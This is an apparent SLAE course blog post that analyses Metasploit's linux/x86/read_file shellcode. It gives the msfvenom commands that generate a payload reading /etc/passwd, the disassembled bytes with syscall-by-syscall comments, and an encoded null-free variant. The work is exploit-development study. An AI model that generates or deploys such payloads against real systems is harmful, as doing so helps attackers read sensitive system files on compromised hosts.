SLAE Assignment 5.2 - Msfvenom linux/x86/read_file shellcode Analysis
25 Apr 2017
Student SLAE - 891
Assignment 5.2:
Our Goal:
Take up at least 3 linux/x86 shellcodes using Msfpayload (now Msfvenom)
- Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
- Present your analysis
Hello everybody,
Here we are for the second analysis of our msf shellcodes. Let’s perform the analysis for the linux/x86/read_file shellcode:
# msfvenom -p linux/x86/read_file --payload-options
Options for payload/linux/x86/read_file:
Name: Linux Read File
Module: payload/linux/x86/read_file
Platform: Linux
Arch: x86
Needs Admin: No
Total size: 62
Rank: Normal
Provided by:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FD 1 yes The file descriptor to write output to
PATH yes The file path to read
Read up to 4096 bytes from the local file system and write it back
out to the specified file descriptor
Let’s examine the generated shellcode:
# msfvenom -p linux/x86/read_file PATH=/etc/passwd -f raw | ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 73 bytes
00000000 EB36 jmp short 0x38
00000002 B805000000 mov eax,0x5
00000007 5B pop ebx
00000008 31C9 xor ecx,ecx
0000000A CD80 int 0x80
0000000C 89C3 mov ebx,eax
0000000E B803000000 mov eax,0x3
00000013 89E7 mov edi,esp
00000015 89F9 mov ecx,edi
00000017 BA00100000 mov edx,0x1000
0000001C CD80 int 0x80
0000001E 89C2 mov edx,eax
00000020 B804000000 mov eax,0x4
00000025 BB01000000 mov ebx,0x1
0000002A CD80 int 0x80
0000002C B801000000 mov eax,0x1
00000031 BB00000000 mov ebx,0x0
00000036 CD80 int 0x80
00000038 E8C5FFFFFF call dword 0x2
0000003D 2F das
0000003E 657463 gs jz 0xa4
00000041 2F das
00000042 7061 jo 0xa5
00000044 7373 jnc 0xb9
00000046 7764 ja 0xac
00000048 00 db 0x00
So let’s comment our shellcode instructions:
jmp short 0x38 ; jmp/call/pop technique
mov eax,0x5 ; int open(const char *pathname, int flags);
pop ebx ; pop the @ of the string starting at 0x3D
xor ecx,ecx ; clears out ecx
int 0x80 ; open syscall
mov ebx,eax ; file descriptor result of the open syscall
mov eax,0x3 ; ssize_t read(int fd, void *buf, size_t count);
mov edi,esp ;
mov ecx,edi ; pointer to a valid stack address
mov edx,0x1000 ; size of buffer that will be read and buffered to the stack
int 0x80 ; read syscall
mov edx,eax ; result of read and third argument of write function
mov eax,0x4 ; ssize_t write(int fd, const void *buf, size_t count);
mov ebx,0x1 ; standard output / ebx is still pointing to the buffer on stack
int 0x80 ; write syscall
mov eax,0x1 ; void _exit(int status);
mov ebx,0x0 ; 0 everything is OK
int 0x80 ; exit syscall
call dword 0x2 ; pushing the @ of the following bytes (/etc/passwd) on the stack
gs jz 0xa4
jo 0xa5
jnc 0xb9
ja 0xac
db 0x00 ; null byte ending string
The jmp/call/pop technique will set the address of the following string in EBX:
# echo -e \\x2F\\x65\\x74\\x63\\x2F\\x70\\x61\\x73\\x73\\x77\\x64
Once again you can generate a shellcode (quite more complex) without null bytes with the following command:
# msfvenom -p linux/x86/read_file PATH=/etc/passwd -f raw -b \x00 | ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 100 (iteration=0)
x86/shikata_ga_nai chosen with final size 100
Payload size: 100 bytes
00000000 BAF7BD341A mov edx,0x1a34bdf7
00000005 DBDF fcmovnu st7
00000007 D97424F4 fnstenv [esp-0xc]
0000000B 5E pop esi
0000000C 29C9 sub ecx,ecx
0000000E B113 mov cl,0x13
00000010 83EEFC sub esi,byte -0x4
00000013 31560F xor [esi+0xf],edx
00000016 0356F8 add edx,[esi-0x8]
00000019 5F pop edi
0000001A C1 db 0xc1
0000001B F1 int1
0000001C 3018 xor [eax],bl
0000001E 2F das
0000001F 06 push es
00000020 3C58 cmp al,0x58
00000022 6B37F5 imul esi,[edi],byte -0xb
00000025 95 xchg eax,ebp
00000026 0BBEC69E0FC1 or edi,[esi-0x3ef0613a]
0000002C C8DE8626 enter 0x86de,0x26
00000030 41 inc ecx
00000031 27 daa
00000032 22A841D85364 and ch,[eax+0x6453d841]
00000038 E151 loope 0x8b
0000003A 91 xchg eax,ecx
0000003B CE into
0000003C E561 in eax,0x61
0000003E 16 push ss
0000003F 2F das
00000040 5E pop esi
00000041 60 pushad
00000042 16 push ss
00000043 2F das
00000044 A0AE9697A1 mov al,[0xa19796ae]
00000049 3097E71A3097 xor [edi-0x68cfe519],dl
0000004F E75C out 0x5c,eax
00000051 FC cld
00000052 17 pop ss
00000053 0F9901 setns [ecx]
00000056 E82F0E9B63 call dword 0x639b0e8a
0000005B B37F mov bl,0x7f
0000005D 13ED adc ebp,ebp
0000005F 40 inc eax
00000060 0CA4 or al,0xa4
00000062 89 db 0x89
00000063 A6 cmpsb
We can see, through the analysis of all of these shellcodes, the power of msfvenom while dynamically generating shellcodes.
Hope you enjoyed this post, see you soon for the second msf shellcode analysis.